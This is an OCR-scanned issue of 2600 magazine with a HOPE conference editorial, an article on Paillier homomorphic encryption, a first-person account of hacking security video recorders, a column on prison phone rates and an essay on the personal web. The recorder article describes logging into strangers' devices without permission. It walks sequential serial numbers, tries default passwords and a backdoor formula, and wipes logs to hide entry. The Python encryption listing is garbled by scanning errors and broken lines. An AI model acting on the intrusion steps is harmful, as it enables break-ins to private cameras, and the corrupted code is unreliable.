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We’ve admittedly never known when 
to quit. People have been advising us to 
since even before we got started. You may 
be somewhat familiar with the thought 
process: play it safe, don’t make waves, 
lead a comfortable and uneventful life. It 
just wasn’t for us - and, we know, not for 
many of those reading this. 

We’ve faced all kinds of struggles 
and challenges throughout our existence, 
many of which could have tipped the 
balance if we weren’t fairly stubborn and 
we didn’t have support from so many in 


the print market, the loss of bookstores, 
distributors who disappeared with our 
money more times than we can count, 
and, of course, increased printing costs. 
To even survive without the help of 
advertisers is a testament to the loyalty 
and the strength of our readers. You make 
the impossible happen - and have for 
some time. 

Then there’s HOPE. This unique 
project has brought together many 
thousands from around the world for 12 
truly amazing conferences in New York. 
We’ve seen it expand steadily over the 
years, as we’ve seen the attendees and 
the hacker community grow, mature, 
and flourish. We don’t have the space to 
list the many uphill battles involved in 
organizing these things, but what we see 
after each event has always filled us with 
tremendous pride. 

Hackers On Planet Earth started as yet 
another crazy idea of how a European- 
style gathering of hackers should also 
be able to happen in the States. Before 
our first conference, the largest hacker 
get-togethers were just that: get-togethers 
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the hacker world. The steady decline of 


mostly of people who already knew each 
other. And those were great and extremely 
important in helping to construct what 
followed. In fact, it was the cancellation 
of one of those intimate gatherings 
(Summercon) in 1994 that led to the birth 
of HOPE as a one-time replacement. 
From that point, the landscape started to 
change and big hacker conferences began 
to spread and thrive. Today, Defcon in Las 
Vegas regularly gets over 20,000 people 
to show up, yet for the most part has 
managed to stay true to the hacker spirit 
that’s been there from the beginning. And 
HOPE made its own history, expanding 
the horizons of what constitutes hacking, 
bringing in speakers like Jello Biafra, 
Daniel Ellsberg, and the Yes Men to join 
hacker legends like Steve Wozniak, Kevin 
Mitnick, and Richard Stallman. Concepts 
and goals like hacktivism, the Tor Project, 
hackerspaces, and SecureDrop all had 
early audiences at HOPE conferences, 
and enthusiastic ones at that. In addition 
to the tech, we mixed in discussions 
of justice and empowerment. Over the 
years, we’ve managed to give the stage 
to well over 1000 speakers. We saw the 
community grow, become more inclusive 
and representative of gender, and open a 
continuing dialogue on how to do better. 
Instead of running from the controversy, 
we openly embraced it - and found that it 
made us stronger. And the best part was 
that most of our attendees really seemed 
to get that. 

Of course, the apparent loss of our 
hotel has really thrown a wrench into 
things. From the beginning, all but one 
of the HOPE conferences has been held 
at the Hotel Pennsylvania in Manhattan. 
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Being right in the middle of midtown 
certainly had its advantages. But when we 
were recently confronted with a tripling of 
the price we were paying, we knew that 
HOPE couldn’t remain there, at least not 
without fundamentally changing what 
HOPE was. We never wanted to price 
ourselves out of the reach of many of our 
attendees. Accessibility has always been 
one of our passions and losing that would 
be a really bitter pill to swallow. 

When we broke the news in late July, 
we expected to hear messages of support. 
But we were absolutely floored by the 
amount. What’s more, we were unprepared 
at how many people wanted to support the 
conference regardless of where it was. 
A significant number actually said they 
would prefer it if we weren’t located in 
Manhattan, where everything tends to be 
more expensive. All kinds of ideas have 
been sent to us, including alternative 
venues, conference formats, and logistical 
ideas we had never even thought of before. 
In short, the hacker community helped to 
rejuvenate our passion and motivated us 
to really spare no effort in figuring out 
how we could make this work. 

It’s easy to forget sometimes, even 
when you’re in the midst of it, how 
amazing things can continue to happen 
when the right people are working 
with you. We’re used to being told that 
something is impossible - and then doing 
it anyway. That’s how we’ve felt about 
all of our conferences so far, because 
everyone knew it simply wasn’t possible 
to pull something like that off. But we’ ve 
never been particularly practical or big 
fans of constricting rules and conformity. 
This annoys the hell out of some people, 
but we’re fairly used to that reaction to 
most of the things we do. Plus, it’s always 
good to be annoying the right people. 

As we go to press, we’re not yet at 
the stage where we know what’s going 
to happen in the summer of 2020, which 
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is when the next HOPE conference was 
supposed to be held. By the time this 
issue comes out, we should have a good 
idea one way or another what the future 
of HOPE will be. So we’re setting a date 
of Monday, October 21st to share this 
information with the world. We will post 
an announcement at www.hope.net and 
www.2600.com on that day. And while we 
can’t say for sure at this point whether this 
will be good or bad news, we can say that 
we've got the very best people working 
on this and that we have the support of so 
many others around the world. And when 
you've got all that on your side, it’s very 
hard for magic not to occur. 
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by Thor Mirchandani 


In the modern world, people are becoming more and more dependent on using other people’s 
computers for their storage and computing needs. Cloud technologies, phone apps, and Software 
as a Service (SaaS) are just a few examples of applications that rely on other people’s machines. 

Most people understand the absolute necessity for securing their data in the Cloud and rely on 
using some form of encryption. Unfortunately, encrypting data in transit or on a cloud disk using 
most of the common encryption algorithms is not sufficient to ensure privacy. 

When you browse, view, or manipulate the data, it is decrypted to plain text and becomes 
visible to a sufficiently privileged software program. Can you really know for sure who else is 
using your cloud instance’? 

Even on a hardened system, data can be read directly from CPU registers and data buses by a 
motivated attacker. If that sounds far-fetched, this is exactly how hardware hacker extraordinaire 
Bunnie Huang hacked the Xbox! For more frivolous examples, consider the technical underpin- 
nings of Kraftwerk’s 1981 song “Pocket Calculator.” If individuals can do it, what are the capa- 
bilities of more well-funded organizations? 


Fully Homomorphic Encryption 
The bottom line is that to be usable, information encrypted with traditional methods has to be 
visible in plain text at some point, if only for a brief moment. Another way to look at it is that a 
man-in-the-middle attack is always possible and as long as the attacker is creative when it comes 
to defining where the “middle” is! 
Does it have to be that way? What if we could reliably manipulate encrypted information 
without ever decrypting it? Turns out that we can. Enter Fully Homomorphic Encryption (FHE). 
FHE is a class of ciphers that have the interesting quality that an arbitrary computation on 
ciphertexts generates an encrypted result which, when decrypted, matches what you would see 
had the same computations been performed on the plaintext. Sounds like black magic, doesn’t it? 
Theoretical FHE systems were postulated in the late 1970s. In the following decades, 
researchers implemented systems that permitted a limited number and limited types of computa- 
tions. Then in 2009, Craig Gentry described a system that could perform any computation, albeit 
very slowly. Basic computations would take hours! But it didn’t take long for Gentry and other 
researchers to come up with implementations many orders of magnitude faster. Those systems are 
finding practical uses today, (Crypto Trivia: Craig Gentry received a MacArthur Genius Award 
for his work on encryption.) 


A Practical SaaS Example 

One application for FHE is SaaS. Alice might have valuable data and Bob might have a valu- 
able algorithm. Neither wants to reveal their “secret sauce” to the other. With traditional encryp- 
tion methods, this would not be possible: The algorithm would have to operate on plaintext data, 
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and Alice and Bob would have to duke it out regarding who should lift the skirt. Typical solutions 
to the dilemma involve lawyers and NDAs. 

Moments before he took his last breath, Alice’s grandfather gave her three top secret numbers 
that will lead to the map coordinates of the spot where his treasure is hidden. To get the real 
coordinates, Alice must add two of the numbers and multiply the third by a constant. Alas, while 
cryptographically savvy, Alice is arithmetically challenged and has to enlist outside help. 

Fortunately, Bob runs a service that can add and multiply encrypted numbers. Alice agrees to 
send Bob her FHE encrypted numbers. Bob will then perform the calculations on the two numbers 
without ever seeing them in plaintext. Calculations completed, Bob returns the encrypted results 
to Alice without ever seeing the plaintext results. When Alice gets the results, she can simply 
decrypt them to get the coordinates. 

We are implementing this interaction in Python - see the listing for fullyhomo.py that follows 
this article. The code was written for Python 3, but should work fine with Python 2 as well. It will 
run on Ubuntu Linux using any one of the following three commands: 

-/fullhomo.py 
python3 fullhomo.py 
python fullhomo.py 

Similar commands are available on Windows. Here is a typical output from running the 
program: 
~/projects/homomorphic$ ./fullyhomo.py 


SaaS Example: 
Alice wants to use Bob’s calculation service to calculate 5 + 10 
She encrypts 5 
...and the encrypted value is 408231311223330758911876050904... 
She then encrypts 10 

«and the encypted value is 6811593647043826157618544194678... 


Alice also wants to to multiply 6 with the constant 3 
She encrypts 6 
...and the encrypted value is 275872367736262799842862895600... 


Then Alice sends the encrypted values to Bob along with her public 
ws key 


Bob adds the two encrypted values without knowing what they are 
the encrypted result is 3509690235178988491246734744677382694... 
Bob multiplies the third encrypted value with the constant 

the encrypted result is 8919545079897387397953169089569936011... 


Bob sends the encrypted results back to Alice 

Alice uses her private key to view the plain text results: 
Addition: 15 

Multiplication: 18 


Armed with the coordinates, Alice packs her shovel and books a trip to Niger. Or did he mean 
Mauritania? Or maybe Namibia? Surely the treasure isn’t in the middle of the Atlantic?!?! East 
versus West, North versus South, these things do matter! 


The Code 

The Python code implements an FHE algorithm called the Paillier cryptosystem. To keep 
things brief and simple, the code only implements the operations required to for the addition and 
multiplication operations. Also, the key pair is hard coded for the sake of simplicity. A full fledged 
implementation would provide code to generate random keys. 

The class FullyHomoCipher on line 14 is the Paillier encryption code. The class BobsCalcula- 
tionService on line 54 defines the operations for addition and multiplication of Paillier-encrypted 
values. 

Our treasure hunt adventure starts on line 75 and uses the two classes described above. 
It’s extensively commented in order to make it easy for the interested reader to modify and 
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experiment. 

A note of caution for readers that aren’t familiar with the Python language: Unlike most 
languages, Python is white-space sensitive, and indentation matters. It’s important to preserve the 
indentation or the program will not execute properly. 


FHE Now and Tomorrow 

Our SaaS example is obviously a toy, but that’s to be expected from about 140 lines of 
commented Python code. More robust, fully featured FHEs built around stronger algorithms are 
finding new applications every day. 

Software as a Service is only one application that’s a good match for FHE. Other types of 
applications include smart contracts, block chain systems, data mining, “vanity” hashes, end- 
to-end encrypted database queries, anonymous identity systems, data integrity verification, and 
so on. With the rapid development in the field, we can expect many other uses in the very near 
future. 

FHE is currently deployed across several industries and problem domains, including elec- 
tronic voting systems, genomics, and payment systems, and we predict widespread adoption in 
areas such as health care, smart power grids, and finance to take place very soon. 


#!/usr/bin/env python3 

import random 

# Alice's Private/Public key pair, hard coded for simplicity 

class PrivateKey(): 
lambdA=738421652409814525549056995904495420889617570042898731779798340789 

05122488912 
mu=1462386606792416204975818590091246298598290203721449108746825548815542 

7133263 


class PublicKey(): 

n=73842165240981452554905699590449542089513117936657660262085094366199671 
389241 

n2=5452665367476409421070096932669081750981552257584472365472731868555542 
65945716364146975917589702883313267090463349562976463520385887547289609343093055 
6081 

g=73842165240981452554905699590449542089513117936657660262085094366199671 
389242 


# Alice's Implementation of a fully homomorphic Paillier cipher 
class FullyHomoCipher (): 
def init__(self, al, bl): 
self.a = al 
self.b = bl 


def expCalc(self, base,exponent,modulus) : 

result = 1 

while exponent > 0: 
if exponent & 1 == 

result = (result * base) % modulus 

exponent = exponent >> 1 
base = (base * base) % modulus 

return result 


def encrypt(self, pub, plain): 
while True: 
xr = random.getrandbits (128) 
if r > 0 and r < pub.n: 
break 
x = self.expCalc(r, pub.n, pub.n2) 
cipher = (self.expCalc(pub.g, plain, pub.n2) * x) % pub.n2 
return cipher 


def decrypt(self, priv, pub, cipher): 
x = self.expCalc(cipher, priv.lambdA, pub.n2) - 1 
Plain = ((x // pub.n) * priv.mu) % pub.n 
return plain 
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def encrypt_message(self, pub, m): 
r = random.randrange (256, pub.n) 
self.encrypt (pub, r) 
a = (m-r) % pub.n 
self.a=a 
self.b =b 


def decrypt_message(self, priv, pub): 
val = (self.a + self.decrypt (priv, pub, self.b)) % pub.n 
return val 


# Bob's encrypted calculation service 
class BobsCalculationService(): 


# Add two encrypted numbers 
def encrypted_add(self, pub, a, b): 
return a * b % pub.n2 


def sum (self, cl, c2, pub): 
a = (cl.a + c2.a) % pub.n 
b = self.encrypted_add(pub, cl.b, c2.b) 
c = FullyHomoCipher(a, b) 
return c 


# Multiply two encrypted numbers with a constant (Bob) 
def encrypted_mult(self, pub, a, n): 
return FullyHomoCipher(-1,-1).expCalc(a, n, pub.n2) 


def product(self, const, cl, pub): 
a = (cl.a * const) $ pub.n 
b = self.encrypted_mult (pub, cl.b, const) 
c = FullyHomoCipher (a,b) 
return c 


# THE SAAS EXAMPLE BEGINS HERE 
if __name__ ‘main 


s 
# Alice's Key Pair 
pub=PublicKkey 
priv=PrivateKey 


# The top secret numbers Alice wants to use 
secretNumber1=5 

secretNumber2=10 

secretNumber3=6 

const=3 


# The Cipher objects Alice uses for encryption 
alicel = FullyHomoCipher (-1,-1) 
alice2 = FullyHomoCipher (-1,-1) 
alice3 = FullyHomoCipher (-1,-1) 


# Alice performs encryption 
print ("SaaS Example:") 
print ("Alice wants to use Bob's calculation service to calculate ", 


secretNumberl,"+",secretNumber2) 


print ("She encrypts ", secretNumber1) 

alicel.encrypt_message (pub, secretNumber1) 

print ("...and the encrypted value is ",alicel.a,alicel.b) 

print ("She then encrypts ",secretNumber2) 
alice2.encrypt_message(pub, secretNumber2) 

print ("...and the encypted value is ",alice2.a,alice2.b) 

pring, {er} 

print ("Alice also wants to to multiply ",secretNumber3," with the 


™ constant ",const) 


print ("She encrypts ", secretNumber3 

alice3.encrypt_message(pub, secretNumber3) 

print ("...and the encrypted value is ",alice3.a,alice3.b) 

prank, (""} 

print ("Then Alice sends the encrypted values to Bob along with her 


public key") 


print ("") 
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# These are the encrypted values Alice sends to Bob 
encrl_a=alicel.a 


t have the private key he < 
FullyHomoCipher (encr1_a,encr1_b) 
bob2 = FullyHomoCipher(encr2_a,encr2_b) 
bob3 = FullyHomoCipher(encr3_a,encr3_b) 


# Addition 
print ("Bo 


adds the two encrypted values without knowing what they are") 
alculationService () m(bobl, bob2, pub) 


rd encrypted value with the constant") 
lculations () .produc , bob3, pub) 
rypted result is ",result2.a,result2.b) 


cnn) 


("Bob s the encrypted results back to Alice") 
("Alice u 

t ("Addit 
print ("Multi 


her private key to view t plain text results:") 


resultl.decrypt_message iv, pub)) 
,result2.decrypt_message(priv, pub)) 
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by Ray Keck 


I have always taken an interest in hacking/ 
phreaking, but never applied anything I have 
learned (for either good or evil purposes)... 
until recently, that is. A couple years ago I 
started working for a manufacturer who sold 
home security equipment (network video 
recorders, IP cameras, etc.). | have had some 
experience with older analog systems in the 
past, but this would be my first foray into 
the IP based world. I was one of three people 
working in tech support helping installers and, 
on occasion, end users with technical issues. It 
wasn’t the greatest work to be doing (as tech 
support typically isn’t), but it was a decent 
paycheck and close to home. 

During my time of employment with the 
company, I had a lot of time to think about and 
evaluate the security of the equipment we were 
selling. We billed ourselves as a manufacturer 
to the customer, but this wasn’t exactly true. 
The truth was that we purchased hardware 
from a Chinese manufacturer and rebranded 
it with our own logo. We also customized the 
firmware that was being flashed to the equip- 
ment. This information wasn’t publicized, and 
we made it a point not to talk about it with 
clients, even if they had brought it up them- 
selves. Sounds like a great business to work 
for, huh? 

Right off the bat, this job had already felt 
suspect to me. While shady business practices 
do not necessarily translate to bad product, it 
was the cheaply manufactured Chinese hard- 
ware (or rather the embedded software) that 
was the issue. This was particularly evident 
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to me about once a year when we would go 
through a flood of calls regarding hacked 
machines and user accounts. The reason these 
machines would get hacked so frequently 
was because of vulnerabilities found in the 
firmware. 

This, of course, isn’t anything new to 
technology. It has always been a cat and 
mouse game between hackers and firmware 
developers since the dawn of time. Take, for 
example, the Xbox 360 when hackers modified 
DVD-ROM firmware to play game backups 
on their machines. Microsoft threw everything 
they could at people modifying their consoles 
to thwart these attempts. But what resulted 
was a back and forth game between both 
parties involved, with Microsoft continuously 
patching, updating, and swapping hardware. 
The difference here is that the cheap Chinese 
manufacturer put forth much less of an effort 
to secure their products. 

For years they used very simple algorithms 
to generate backdoor passwords with informa- 
tion that was widely available on the Internet 
to those who were interested. The backdoors 
were intended for people who forgot their 
passwords. But rather than give them a way to 
do it on their own (like a password reset link 
on the web interface landing page), all they 
had to do was call us. The backdoor codes 
were generated something like this: 8888 x 
day x month x year, the last six digits were the 
password. We only generated those backdoor 
passwords for installers and law enforcement, 
which was supposed to curb them from falling 
into the wrong hands. 


This was a fine idea in the beginning, but 
ended up being half-baked in the end, This was 
because we had no way to verify the identity 
of the person calling. Anyone could call in 
and say that I am “Mr SoAndSo” with “Fake- 
Company” and tell us “I need a backdoor for 
Serial Number xxxxx” and they would have 
no trouble getting it. This, of course, has since 
been patched with stronger algorithms to keep 
people from generating their own passwords. 
But people calling in to get passwords still 
remained an issue. Oftentimes when companies 
install security equipment, they leave default 
settings on them. Way too many calls started 
out with “I can’t get into my NVR anymore 
using the credentials of admin:admin.” Is this 
an end user problem? Sure it is, to an extent. 
But when installers lack the technical knowl- 
edge to actually set the equipment up properly, 
there is more of an underlying issue here. 

One day I was curious as to how many of 
these machines were out there - machines that 
still were using default passwords or hadn’t had 
patched firmware applied to them. I wanted to 
see if I could hack into some of them for fun and 
to show my company how flimsy the security 
actually was. One defect with these machines 
is that firmware updates are applied manually, 
which means that only people who have called 
us have had their machines updated. The firm- 
ware for these devices is not available publicly, 
which further cements the fact that there are 
still many machines sitting in the wild unpro- 
tected. Anyone familiar with modern security 
equipment is probably aware that they come 
with a feature called P2P (or peer-to-peer). 
This allows people with little or no networking 
knowledge to set up their equipment for remote 
access by scanning a 2D barcode or inputting 
the serial number into some software so that 
they can view their cameras remotely. Fortu- 
nately for me, the serial numbers were created 
sequentially, which made it easy to find poten- 
tial targets by running through them in order. 

I started with a known serial number and 
incremented it by one every time I made 
a login attempt. The admin account on the 
machines cannot be deleted (another vulner- 
ability), so that all I had to worry about was 
getting the password correct. I started by 
trying the default password of “admin” first. 
If I couldn’t get in this way, I would then try 
generating a backdoor. The backdoor pass- 
words were supposed to be local access only, 


and didn’t work through the web interface, 
so all logins that I performed were using the 
client software (yet another vulnerability). 

I found that after several attempts on 30 
different machines, I was able to success- 
fully get into six of them. This is definitely a 
high enough number to raise some concern to 
management (or so I thought). I cleared the 
event logs on the systems before exiting so 
that any evidence of my entry was removed. 
White hatters will sometimes change the 
OSD (on screen display) to display something 
like “HACKED” so that the user is aware of 
what happened without ever taking complete 
control. It also serves as a warning of potential 
danger if the problem is left ignored. 

In theory, I probably could have maintained 
access to these machines for months, or even 
years if I were inclined to do so, But I chose 
to leave things alone and never again log into 
those machines. This only served as sort of 
a “proof of concept” approach to show how 
easily it could be done. 

After bringing my concerns to the attention 
of the higher-ups, it was fluffed off as a known 
issue that was being worked on. My sugges- 
tion was to have the machines auto-update 
firmware on the fly, but this kind of function- 
ality seemed like too much trouble to incorpo- 
rate. Little has changed, and even to this day it 
is still easy to break into these machines. 

In closing, I just wanted to emphasize that 
there are things that can be done to secure these 
machines so that any risk involved is minimal. 
Updating firmware, closing ports, and 
disabling P2P are all effective ways to beef up 
security. Make sure that your equipment is also 
behind a firewall. And finally, check event logs 
often. Most hackers don’t bother to clear them 
when they are finished with their dirty work. A 
lot of home routers keep records of this kind of 
activity as well. If you absolutely have to keep 
ports open, avoid using port 80 for http traffic 
and don’t use default TCP settings. Also, vari- 
ants of port 80 are bad (8080, 8000, etc.) and 
shouldn’t be used either. Keep in mind that 
http ports aren’t usually required for viewing, 
but for remote management purposes only. 

When a security company can’t seem to 
get “security” right, it makes you question 
how secure anything really is. But what makes 
this so significant is that it is an invasion of 
privacy, a scary reality of the modern world, 
and it has to make one ponder the question: 
”Who is watching us?” 
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by The Prophet 


Hello, and greetings from the Central Office! 
It’s moving day, by which I mean another filthy 
CLEC, hanging on by its fingernails for years, has 
finally gone out of business and is moving their 
junky old equipment out. Of course, we were kind 
enough to provide their customers with uninter- 
rupted service by taking over their accounts. 
Naturally, we’re charging them full price as well, 
which - surprisingly - is cheaper in some cases 
than what the CLEC was charging them. 

Our wholesale rates to filthy CLECs are based 
on a fixed percentage discount off our regulated 
rates. The discount varies depending upon the 
level of services we provide on behalf of the 
CLEC (such as operator services, repair service, 
whether they use our switch or their own, and 
even whether they do their own billing or have 
us do it). The CLEC is always responsible for 
paying us; if their customer fails to pay, it isn’t 
supposed to be our problem. This particular 
CLEC, however, sold services without collecting 
a deposit, below cost, to a lot of marginal and 
startup businesses who just weren’t very good at 
paying their bills. It turns out this is not a good 
business model. Over time, the CLEC became 
not very good at paying our bills, which even- 
tually resulted in a protracted negotiation. They 
were expert at paying just enough that, under the 
state tariffs, we had to continue providing them 
service, but not enough to ever have a profitable 
business or ever fix anything that was wrong with 
their network. 

Over the years, we have managed to move 
many of our services out of the “regulated” side 
of the house to the “unregulated” side. Essentially, 
any modern broadband, or service delivered via 
the modern broadband network, is unregulated 
which means that we aren’t required to file rates, 
comply with tariffs, or provide services anywhere 
that isn’t convenient for us to do so (sorry, but 
you won’t be getting 100Mbps Internet at your 
trailer a few miles outside of Tenino - we’ll sell 
you a POTS line and you can try dial-up instead). 
Additionally, depending upon the state, tradi- 
tional wireline services bundled with modern 
broadband services are also often unregulated, 
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meaning we can undercut CLECs wholesale (get 
it?). They aren’t entitled to share these networks 
(thanks, FCC!) and they aren’t tariffed so they 
can’t receive a discount. In fact, they don’t have 
access to these services from us at all. So, as 
more and more telephony has moved to VoIP 
and is carried over broadband networks, CLECs 
have found it harder and harder to compete. And 
for my part, that’s just fine because it means job 
security! 

Speaking of tariffed rates, I’ve been getting 
a lot of phone calls from a federal prison lately 
at truly astronomical rates. The Felon is currently 
incarcerated there, and for some reason, she has 
my phone number. I must be the only person left 
who picks up the phone from numbers where 
Caller ID is blocked. Federal prisons charge the 
prisoner an FCC-regulated rate of 21 cents per 
minute for long distance calls, and six cents per 
minute for local calls. These are rates we haven’t 
seen outside of prisons since the 1990s, but they 
are actually considered low for jails and prisons 
where rates can exceed $1 per minute. 

In 2013, the FCC was making good progress 
on cracking down. Two prison phone providers 
dominate the jail and prison phone market: Global 
Tel*Link (aka GTL) and Securus. These compa- 
nies make the slimiest COCOT provider look 
legitimate. Many telecommunications contracts 
negotiated by these providers offered a revenue 
share with jails and prisons (yes, including 
privately operated, for-profit prisons). This 
created an incentive for prison phone compa- 
nies to charge high fees and per-minute pricing 
and imposed - in effect - a tax on the families of 
inmates. 

Bowing to political pressure in 2013, after a 
series of proposed rulemakings, the FCC initially 
capped rates on interstate calls at 21 cents per 
minute for prepaid calls, and 25 cents per minute 
for collect calls. In 2015, prison phone providers 
were further restricted to maximum charges on 
the following ancillary fees: 

¢ Taxes and regulatory fees: Actual tax rate 
with no markup 
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« Automated payment fees (via phone system, 
website, or kiosk): $3.00 

¢ Live agent fee (wherein a live agent processes 
a payment): $5.95 

* Paper bill/statement fee: $2.00 

© Third-party financial transaction fee (such as 
Western Union): Pass-through at actual cost. 
The FCC also imposed some rules around 

creating prepaid accounts. In order to avoid 

game playing to generate excessive payment 

fees, prison phone providers weren’t allowed to 

impose a prepaid account maximum below $50. 

In 2015, the FCC also set lower maximum 
rates: 

¢ State or federal prisons: 11 cents/minute 

¢ Jails with 1,000 or more inmates: 14 cents/ 
minute 

¢ Jails with 350-999 inmates: 16 cents/minute 

¢ Jails of up to 349 inmates: 22 cents/minute 

The prison phone providers immediately 
sued, and the court granted a stay of the new rates 
going into effect. Accordingly, rates were frozen 
at the 2013 interstate rates. 

In 2016, the FCC adjusted its proposed 
maximum interstate rates, in an attempt to moot 
the earlier litigation: 

¢ State or federal prisons: 13 cents/minute 

¢ Jails with 1,000 or more inmates: 19 cents/ 
minute 

* Jails with 350-999 inmates: 21 cents/minute 

* Jails of up to 349 inmates: 31 cents/minute 

The effort didn’t work. Prison © phone 
providers again immediately sued, and the court 
again granted a stay of the new rates going into 
effect. Accordingly, rates remained frozen at the 
2013 interstate rates. 

As you can see, the FCC has been thwarted 
at every turn in attempting to regulate price 
gouging rates and, in addition, they left some big 
loopholes which prison phone providers have 
exploited to make more money. First of all, the 
cost of intrastate calls wasn’t regulated (because 
the FCC lacks authority over intrastate calls), 
meaning that the majority of calls from jails and 
state prisons aren’t at FCC-regulated rates. This 
doesn’t mean the rates aren’t regulated, but it’s 
left to the states, some of which are better than 
others. Additionally, payment fees are allowed 
to be charged per call, even though you can also 
set up an account with the prison phone provider 
(the FCC requires them to allow this) and make a 
deposit on your account in order to avoid multiple 
payment fees. 

There are some other tricks as well. Many 
people receiving calls from jails and prisons are 
living on the economic margins, so they make 
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payments via Western Union, MoneyGram, etc. 
The payment providers charge a higher fee than 
normal for payments to prison phone accounts, so 
they can rebate a portion of the fee to the prison 
phone provider. Additionally, some prison phone 
providers have invented additional services 
such as voicemail, for which they charge extra, 
unregulated rates. Finally, services such as video 
calling (which has replaced in-person visitation 
at many facilities) cost whatever prison phone 
providers want to charge. 

Kickbacks are rife in the industry, despite the 
obvious conflict of interest. The Prison Policy 
Initiative discovered some common patterns of 
kickbacks: 

* Paying the facility a “signing bonus” for the 
contract. 

¢ Paying annual or monthly “administrative 
fees.” 

* Providing phone-related technology, like cell- 
phone jamming equipment or call recording 
equipment. 

¢ Providing computer equipment for correc- 
tions staff, law libraries, and _ religious 
services. 

¢ Paying exorbitant “rent” for the vendor's 
equipment at a correctional facility. 

In addition to this, suspiciously timed 
campaign donations and donations to police- 
affiliated organizations have been made by prison 
phone providers. And naturally, jails and prisons 
that were charging commissions (which have 
fallen out of political favor) have been caught 
inventing new fees that involve almost exactly 
the same amount of money previously collected 
from prison phone providers in the form of 
commissions. 

It is against this backdrop that there is an 
epidemic of smuggled cell phones found in 
prisons. The higher prison phone rates go, it 
seems the more willing prisoners are to take the 
risk of being caught with contraband. It doesn’t 
really make much sense to me that prisoners 
aren’t allowed to use mobile phones. Using 
microcells alongside features already deployed 
in law enforcement “stingray” technology, 
substantially all of the security features currently 
available from prison phone providers could be 
applied to mobile phones. However, this wouldn't 
make jails, prisons, or prison phone providers any 
money, so the friends and family of prisoners will 
continue paying - in effect - a “prison tax.” 

And with that, it’s time to rake some leaves. 
Have a lovely autumn, and I'll see you again in 
the winter! 
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The Internet today feels very open and 
accessible. But the Internet seems to have lost 
its mystery and charm. Before, you never knew 
what you would run into - you could search a 
new term and find a fan site completely dedi- 
cated to the topic. Search “canadian owls” 
and you might find a website created by a 
researcher, someone who had spent years of 
their life perfecting their research and knowl- 
edge, someone who had spent hours and 
hours creating this Internet-accessible portal 
into their depth of knowledge. But today, that 
feeling and mystery is almost completely gone. 
Search “canadian owls” and what are you 
greeted with? Many large websites operated by 
foundations and companies. Sure, they have 
encyclopedia-like information on the topic, but 
there’s no personal touch. There’s no author 
to contact, there’s no one you could have an 
email correspondence with, asking them ques- 
tions about owls. Instead, you’re presented 
with plastic-feeling template websites with 
information collected from various sources 
and papers. If there’s an author’s touch, you'd 
never know because none of the pages are 
signed. 

While this is optimal for getting informa- 
tion out of the Internet, you’re missing the 
human touch, You’re missing the personal- 
ization that made you say, “Wow, I’m on Dr. 
Orton’s owl website!” You’re missing those 
strange owl gifs that Dr. Orton seemed to 
insert in the background of all of her pages - 
the patterned backgrounds that never really 
seemed to fit the design of the site, but you 
would miss them if they were gone. 

It’s like going to a McDonald’s instead of 
your local family eatery. Sure, you may be 
able to read their menu a bit clearer, and you’re 
able to receive your food more efficiently, 
but there’s no personality. You don’t have a 
favorite McDonald’s cashier. You don’t get 
to know the owner, and you don’t get to taste 
the personal cooking of the guy running the 
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kitchen. There are no types of food from the 
owner’s country, and there are no recipes that 
have been passed down for generations. And 
let’s not forget the reason McDonald’s is like 
that: they’re trying to make a profit. They’re 
not expanding due to their love of food and 
need to share it with the world; McDonald’s 
is expanding and opening new stores because 
people think “I bet people in this area would 
buy McDonald’s - I think I could make money 
by owning a franchise here.” 

Let’s switch back to websites. Many of 
them aren’t driven by a love for what they do; 
they’re driven by a love for profits. Perhaps 
owls weren't the best example - let’s do the 
total opposite and look at some anime. If you 
Google search for Sailor Moon, an extremely 
well-known anime from the past decade, 
you'll get a lot of search results. Wikipedia, 
IMDB, Anime News Network, Hulu, Amazon, 
Kotaku, Crunchyroll. All of these are huge 
websites that care little about Sailor Moon as 
a series - to many of them, it’s simply another 
news story to discuss so they can make money 
off ads, another show to stream and run 
commercials on. There are no fan websites 
in the first few pages of Google. Sure, you'll 
eventually find a few Wikias, and Wikipedia is 
an obvious omission from the “companies that 
just want to make money off of you” list, but 
we run into the same problems. These Wikias 
and whatnot have no personal touch - sure, you 
can find a list of Sailor Moon episodes. Sure, 
you can find a summary of the plot of the show. 
But will you find Shriya Patel’s analysis of the 
plot? No. Will you find someone’s blog post, 
talking about which of the cast they think is 
the best girl, and why they believe that to be 
true? No. 

I think the first creation that started to 
strip these sites from the Internet was forums. 
Many people simply discussed these things on 
forums, since it was free and didn’t require you 
to create your own website. Now, this obvi- 
ously wasn’t the only reason - don’t forget that 
Usenet has been a thing since the 1990s, and 
telephone BBSes since long before that. But it 
was still a large catalyst. 
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These forums create walled-in communi- 
ties whose knowledge becomes off-limits to 
the rest of the Internet. Chances are there have 
been dozens of popular forums over the years 
that have discussed Sailor Moon. Hundreds, 
even. But many probably required an account 
to read threads, and as such weren’t indexed 
by Google. Or perhaps, as their membership 
dwindled, they slowly went offline, never to be 
archived or remembered. Users on that forum 
probably had valid opinions on the show that 
would seem like a treasure trove to fans of 
today - what did people think, in real-time, as 
the first season of Sailor Moon aired’? What 
were people posting about the show online? 
But now, we’ll never know. 

Forums were bad, but at least the ones that 
were indexed by Google are still searchable. 
You'll find many of these relics while looking 
for programming questions on the Internet - 
rarely answered questions in a ten-plus-year- 
old thread that has somehow achieved the 
highest SEO rating for your search on Google. 
But social media has stepped in to change that. 
Now, websites like Facebook and Twitter are 
transforming the future of live Q&As. Let’s 
say you want to learn about how to make your 
Honda Civic faster. You log onto Facebook and 
search for groups with “Honda Civic” in the 
name. Perfect! A group specifically for Civics 
of your exact generation, and it has thousands 
of members! You join, and ask “Hey guys, I 
have a 2001 Honda Civic. How can I make 
it faster?” You’re immediately flamed off the 
group, insulted into oblivion, and your post is 
deleted by the moderators. You see, the people 
of this group are sick of answering the same 
questions over and over, but it’s because of the 
layout of Facebook’s groups that this occurs. 

Let’s roll it back five years. 

You want to make your Honda Civic faster. 
You search “How to make my Civic faster” 
on Google and are directed to the Honda-Tech 
forums. There, you see they have all sorts of 
sub-forums about different model Civics, so 
you choose your generation. From there, it’s 
even more granular - sub-forums about engine 
tuning, chassis modifications, tire choice, 
paint jobs, interior, etc. You click the forum 
for engine tuning, knowing that to make your 
car faster, you normally mess with the engine. 
You start looking down the list of threads, and 
the first one jumps out at you - “READ THIS 
BEFORE MAKING A POST!!!!!!!" You 
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click on the thread, and in it, a user has nicely 
summarized a lot of common engine upgrades, 
how much horsepower they make, and linked 
relevant threads on how to do them. Awesome! 
From here, you can research each specific 
upgrade more, and then make a thread asking 
questions when you have a more relevant ques- 
tion that shows you’ve put some thought into 
it. Of course, this magic didn’t always work on 
forums - you would still sometimes get users 
